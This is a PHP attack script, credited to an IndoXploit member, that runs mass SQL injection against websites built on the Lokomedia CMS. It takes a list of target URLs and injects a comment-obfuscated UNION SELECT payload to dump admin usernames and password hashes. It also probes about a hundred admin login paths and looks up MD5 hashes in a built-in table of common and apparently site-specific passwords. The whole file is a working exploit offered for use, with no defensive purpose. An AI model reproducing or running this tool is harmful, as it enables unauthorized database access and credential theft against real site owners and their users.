Lokomedia (SQL Injection)+Auto Scan Admin Login [Web Based]

1. <?php
2. set_time_limit(0);
3. error_reporting(0);
4. // Lokomedia (SQL Injection) + Auto Scan Admin Login
5. // enjoyyyy
6. // Coded by Mr. Error 404 (l0c4lh34rtz) - IndoXploit - Sanjungan Jiwa
7. // greetz: res7ock crew - j*ncok Sec
8.  
9. //HARAP TIDAK MENGGANTI COPYRIGHT JIKA KALIAN INGIN DIHARGAI ^^
10.  
11. function cover() {
12.     echo "[ =========================================================================== ]<br>";
13.     echo " --> Lokomedia (SQL Injection) + Auto Scan Admin Login <--<br>";
14.     echo " ## Coded by Mr. Error 404 (l0c4lh34rtz) - IndoXploit - Sanjungan Jiwa ##<br>";
15.     echo " # greetz: res7ock crew - j*ncok Sec #<br>";
16.     echo "[ =========================================================================== ]<br><br>";
17. }
18.  
19. ?>
20. <html>
21. <head>
22. <style type="text/css">
23. textarea {
24.     width: 500px;
25.     height: 200px;
26.     border: 1px solid #000000;
27.     margin: 5px auto;
28.     padding: 7px;
29. }
30. input[type=submit] {
31.     width: 500px;
32.     height: 25px;
33.     border: 1px solid #000000;
34.     background: transparent;
35.     margin: 5px auto;
36.     background: #000000;
37.     color: #ffffff;
38.     cursor: pointer;
39. }
40. </style>
41. </head>
42. <center>
43. <?php cover(); ?>
44. <form method="post">
45. <textarea name="target" placeholder="http://www.target.com/" style="width: 500px; height: 250px;" required></textarea><br>
46. <input type="submit" name="go" value="Xploit" style="width: 500px;">
47. </form>
48. </center>
49. <?php
50. function ngcurl($url) {
51.     $curl = curl_init($url);
52.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
53.     curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
54.     $content = curl_exec($curl);
55.     curl_close($curl);
56.     return $content;
57. }
58. $admin = array(
59. 'adm/',
60. '_adm_/',
61. '_admin_/',
62. '_administrator_/',
63. 'operator/',
64. 'sika/',
65. 'develop/',
66. 'ketua/',
67. 'redaktur/',
68. 'author',
69. 'admin/',
70. 'administrator/',
71. 'adminweb/',
72. 'user/',
73. 'users/',
74. 'dinkesadmin/',
75. 'retel/',
76. 'author/',
77. 'panel/',
78. 'paneladmin/',
79. 'panellogin/',
80. 'redaksi/',
81. 'cp-admin/',
82. 'master/',
83. 'master/index.php',
84. 'master/login.php',
85. 'operator/index.php',
86. 'sika/index.php',
87. 'develop/index.php',
88. 'ketua/index.php',
89. 'redaktur/index.php',
90. 'admin/index.php',
91. 'administrator/index.php',
92. 'adminweb/index.php',
93. 'user/index.php',
94. 'users/index.php',
95. 'dinkesadmin/index.php',
96. 'retel/index.php',
97. 'author/index.php',
98. 'panel/index.php',
99. 'paneladmin/index.php',
100. 'panellogin/index.php',
101. 'redaksi/index.php',
102. 'cp-admin/index.php',
103. 'operator/login.php',
104. 'sika/login.php',
105. 'develop/login.php',
106. 'ketua/login.php',
107. 'redaktur/login.php',
108. 'admin/login.php',
109. 'administrator/login.php',
110. 'adminweb/login.php',
111. 'user/login.php',
112. 'users/login.php',
113. 'dinkesadmin/login.php',
114. 'retel/login.php',
115. 'author/login.php',
116. 'panel/login.php',
117. 'paneladmin/login.php',
118. 'panellogin/login.php',
119. 'redaksi/login.php',
120. 'cp-admin/login.php',
121. 'terasadmin/',
122. 'terasadmin/index.php',
123. 'terasadmin/login.php',
124. 'rahasia/',
125. 'rahasia/index.php',
126. 'rahasia/admin.php',
127. 'rahasia/login.php',
128. 'dinkesadmin/',
129. 'dinkesadmin/login.php',
130. 'adminpmb/',
131. 'adminpmb/index.php',
132. 'adminpmb/login.php',
133. 'system/',
134. 'system/index.php',
135. 'system/login.php',
136. 'webadmin/',
137. 'webadmin/index.php',
138. 'webadmin/login.php',
139. 'wpanel/',
140. 'wpanel/index.php',
141. 'wpanel/login.php',
142. 'adminpanel/index.php',
143. 'adminpanel/',
144. 'adminpanel/login.php',
145. 'adminkec/',
146. 'adminkec/index.php',
147. 'adminkec/login.php',
148. 'admindesa/',
149. 'admindesa/index.php',
150. 'admindesa/login.php',
151. 'adminkota/',
152. 'adminkota/index.php',
153. 'adminkota/login.php',
154. 'admin123/',
155. 'admin123/index.php',
156. 'admin123/login.php',
157. 'logout/',
158. 'logout/index.php',
159. 'logout/login.php',
160. 'logout/admin.php',
161. 'adminweb_setting',
162. );
163. $real_pass = array(
164. "a66abb5684c45962d887564f08346e8d" => "admin123456",
165. "99026ab4ab3de96f3d7ae33c8c85057b" => "master!@#$qwe",
166. "c630643500720b255abb22e2ab2c31f6" => "sumedang123",
167. "1c63129ae9db9c60c3e8aa94d3e00495" => "1qaz2wsx",
168. "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
169. "93261ae77f0df5522dd9767203f3aa17" => "house69",
170. "f243df64be7184fb0fc07bd6cf53185b" => "b1smillah",
171. "37c77ada62ec68d1b740717fc886bef6" => "Suk4bum1",
172. "d39b59b946b414c4e5926f9c7b23840a" => "kasitaugakya",
173. "fbff29af096fa646757ce8439b644714" => "vro190588",
174. "1feadc10e93f2b64c65868132f1e72d3" => "agoes",
175. "0192023a7bbd73250516f069df18b500" => "admin123",
176. "7aa1dfee8619ac8f282e296d83eb55ff" => "meong",
177. "24fa5ee2c1285e115dd6b5fe1c25a333" => "773062",
178. "d557fd4686821b5d8b927cdfe6e67d21" => "#admin#",
179. "5fec4ba8376f207d1ff2f0cac0882b01" => "admin!@#",
180. "a01726b559eeeb5fc287bf0098a22f6c" => "@dm1n",
181. "73acd9a5972130b75066c82595a1fae3" => "ADMIN",
182. "511f2efed0e465e700a951f2f1ecec19" => "bs1unt46",
183. "7b7bc2512ee1fedcd76bdc68926d4f7b" => "Administrator",
184. "99fedb09f0f5da90e577784e5f9fdc23" => "ADMINISTRATOR",
185. "e58bfd635502ea963e1d52487ac2edfa" => "!@#123!@#123",
186. "5449ccea16d1cc73990727cd835e45b5" => "ngadimin",
187. "c21f969b5f03d33d43e04f8f136e7682" => "default",
188. "1a1dc91c907325c69271ddf0c944bc72" => "pass",
189. "fffdf0489f264598e9d35cba0381e9ac" => "sukmapts",
190. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
191. "5ebe2294ecd0e0f08eab7690d2a6ee69" => "secret",
192. "c893bad68927b457dbed39460e6afd62" => "prueba",
193. "b2ca9cfa6067282a031d28a54886822d" => "admin4343",
194. "3a3795bb61d5377545b4f345ff223e3d" => "bingo",
195. "e172dd95f4feb21412a692e73929961e" => "bismillah",
196. "8221303fbf816fd9da96be7dd4c92f99" => "salawarhandap123",
197. "0570e3795fbe97ddd3ce53be141d1aed" => "indoxploit",
198. "098f6bcd4621d373cade4e832627b4f6" => "test",  
199. "976adc43eaf39b180d9f2c624a1712cd" => "adminppcp",
200. "5985609a2dc01098797c94a43e0a1115" => "masarief",
201. "21232f297a57a5a743894a0e4a801fc3" => "admin",
202. "1870a829d9bc69abf500eca6f00241fe" => "wordpress",
203. "126ac9f6149081eb0e97c2e939eaad52" => "blog",
204. "fe01ce2a7fbac8fafaed7c982a04e229" => "demo",
205. "04e484000489dd3b3fb25f9aa65305c6" => "redaksi2016",
206. "91f5167c34c400758115c2a6826ec2e3" => "administrador",
207. "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
208. "c93ccd78b2076528346216b3b2f701e6" => "admin1234",
209. "912ec803b2ce49e4a541068d495ab570" => "asdf",
210. "1adbb3178591fd5bb0c248518f39bf6d" => "asdf1234",
211. "e99a18c428cb38d5f260853678922e03" => "abc123",
212. "a152e841783914146e4bcd4f39100686" => "asdfgh",
213. "a384b6463fc216a5f8ecb6670f86456a" => "qwert",
214. "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
215. "b59c67bf196a4758191e42f76670ceba" => "1111",
216. "96e79218965eb72c92a549dd5a330112" => "111111",
217. "4297f44b13955235245b2497399d7a93" => "123123",
218. "c33367701511b4f6020ec61ded352059" => "654321",
219. "81dc9bdb52d04dc20036dbd8313ed055" => "1234",
220. "e10adc3949ba59abbe56e057f20f883e" => "123456",
221. "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
222. "25d55ad283aa400af464c76d713c07ad" => "12345678",
223. "25f9e794323b453885f5181f1b624d0b" => "123456789",
224. "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
225. "befe9f8a14346e3e52c762f333395796" => "qawsed",
226. "76419c58730d9f35de7ac538c2fd6737" => "qazwsx",
227. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
228. "bed128365216c019988915ed3add75fb" => "passw0rd",
229. "21232f297a57a5a743894a0e4a801fc3" => "admin",
230. "e10adc3949ba59abbe56e057f20f883e" => "123456",
231. "5f4dcc3b5aa765d61d8327deb882cf99" => "password",
232. "25d55ad283aa400af464c76d713c07ad" => "12345678",
233. "f379eaf3c831b04de153469d1bec345e" => "666666",
234. "96e79218965eb72c92a549dd5a330112" => "111111",
235. "fcea920f7412b5da7be0cf42b8c93759" => "1234567",
236. "d8578edf8458ce06fbc5bb76a58c5ca4" => "qwerty",
237. "6f3cac6213ffceee27cc85414f458caa" => "siteadmin",
238. "200ceb26807d6bf99fd6f4f0d1ca54d4" => "administrator",
239. "63a9f0ea7bb98050796b649e85481845" => "root",
240. "4297f44b13955235245b2497399d7a93" => "123123",
241. "c8837b23ff8aaa8a2dde915473ce0991" => "123321",
242. "e807f1fcf82d132f9bb018ca6738a19f" => "1234567890",
243. "4ca7c5c27c2314eecc71f67501abb724" => "letmein123",
244. "cc03e747a6afbbcbf8be7668acfebee5" => "test123",
245. "62cc2d8b4bf2d8728120d052163a77df" => "demo123",
246. "32250170a0dca92d53ec9624f336ca24" => "pass123",
247. "46f94c8de14fb36680850768ff1b7f2a" => "123qwe",
248. "200820e3227815ed1756a6b531e7e0d2" => "qwe123",
249. "c33367701511b4f6020ec61ded352059" => "654321",
250. "f74a10e1d6b2f32a47b8bcb53dac5345" => "loveyou",
251. "172eee54aa664e9dd0536b063796e54e" => "adminadmin123",
252. "e924e336dcc4126334c852eb8fadd334" => "waskita1234",
253. "02631cc1d0cc5bda188566e90d0ae16c" => "rsamku2013",
254. "b69cbef044eac6fc514a2988e62c5b30" => "unlock08804",
255. "12e110a1b89da9b09a191f1f9b0a1398" => "nalaratih",
256. "f70d32432ff0a8984b5aadeb159f9db6" => "Much240316",
257. "a2fffa77aa0dde8cd4c416b5114eba21" => "gondola",
258. "2b45af95ce316ea4cffd2ce4093a2b83" => "w4nd3szaki",
259. "c5612a125d8613ddae79a6b36c8bee37" => "Reddevil#21",
260. "6e7fbe8e6147e2c430ce7e8ab883e533" => "R4nd0m?!",
261. "5136850b6c8f3ebc66122188347efda0" => "adminku",
262. "5214905fbe8d7f0bb0d0a328f08af3f0" => "adminpust4k4",
263. "acfc976c2d22e4a595a9ee6fc0d05f27" => "dikmen2016",
264. "dcdee606657b5f7d8b218badfeb22a90" => "masputradmin",
265. "ecb4208ee41389259a632d3a733c2786" => "741908",
266. "827ccb0eea8a706c4c34a16891f84e7b" => "12345",
267. "855be097acdf2fea4e342615a154ca3c" => "tolol",
268. "eeee80342778e7b497d507f89094b10d" => "master10",
269. "d29c0398602e6cf005f0dcb7a0443c7d" => "adminjalan",
270. "9062756924cf10763cc89cf2793a77ab" => "pass4@nd1",
271. "8b6bc5d8046c8466359d3ac43ce362ab" => "ganteng",
272. "528d06a172eb2d8fab4e93f33f3986a8" => "jasindolive",
273. "058fe7f85df1e992ef7bf948f1db7842" => "404J",
274. "abe1f4492f922a9111317ed7f7f8e723" => "bantarjati5",
275. );
276. $sites = explode("\r\n", htmlspecialchars($_POST['target']));
277. if(isset($_POST['go'])) {
278.     foreach($sites as $url) {
279.         if(!preg_match("/^http:\/\//", $url) AND !preg_match("/^https:\/\//", $url)) {
280.             $url = "http://$url";
281.         } else {
282.             $url = $url;
283.         }
284.         $statis = "";
285.         $sisa = "";
286.         $login = "";
287.         $param_list = array("statis","kategori","berita");
288.         $curl = ngcurl($url);
289.         $curl = str_replace("'", '"', $curl);
290.         foreach($param_list as $param) {
291.             preg_match_all("/$param-(.*?)\">/", $curl, $id);
292.             foreach($id[1] as $stat) {
293.                 $pecah = explode("-", $stat);
294.                 $statis .= $pecah[0];
295.                 $sisa .= $pecah[1];
296.                 break;
297.             }
298.             foreach($admin as $adminweb) {
299.                 $curl_admin = ngcurl("$url/$adminweb");
300.                 if(preg_match("/administrator|username|password/i", $curl_admin) AND !preg_match("/not found|forbidden|404|403|500/i", $curl_admin)) {
301.                     $login .= "$url/$adminweb";
302.                     break;
303.                 }
304.             }
305.             $sql = ngcurl("$url/$param-$statis'/*!50000UniON*/+/*!50000SeLeCT*/+/*!50000cOnCAt*/(0x696e646f78706c6f6974,0x3c6c693e,username,0x20,password,0x3c6c693e)+from+users--+---+-$sisa");
306.             preg_match("/<meta name=\"description\" content=\"(.*?)\">/", $sql, $up);
307.             preg_match("/<li>(.*)<li>/", $up[1], $akun);
308.             $data = explode(" ", $akun[1]);
309.             echo "[+] URL: $url\n";
310.             //echo "[+] param: $param\n";
311.             if(htmlspecialchars($curl) !== htmlspecialchars($sql)) {
312.                 if(preg_match("/indoxploit/", $sql)) {
313.                     //echo "[ Injection Successfully ]\n";
314.                     if($data[0] == "" || $data[1] == "") {
315.                         echo "[+] Not Injected :(\n\n";
316.                         break;
317.                     } else {
318.                         echo "[+] username: ".$data[0]."\n";
319.                         $passwd = $real_pass[$data[1]];
320.                         if($passwd == "") {
321.                             $passwd = $data[1];
322.                             simpen($data[1]);
323.                         }
324.                         echo "[+] password: $passwd\n";
325.                     }
326.                     if($login == "") {
327.                         echo "[+] Login Admin ga ketemu :(\n\n";
328.                     } else {
329.                         echo "[+] Login: $login\n\n";
330.                     }
331.                     break;
332.                 } else {
333.                     echo "[+] Not Injected :(\n\n";
334.                     break;
335.                 }
336.             } else {
337.                 echo "[+] Not Injected :(\n\n";
338.                 break;
339.             }
340.         }
341.     }
342. }
343. ?>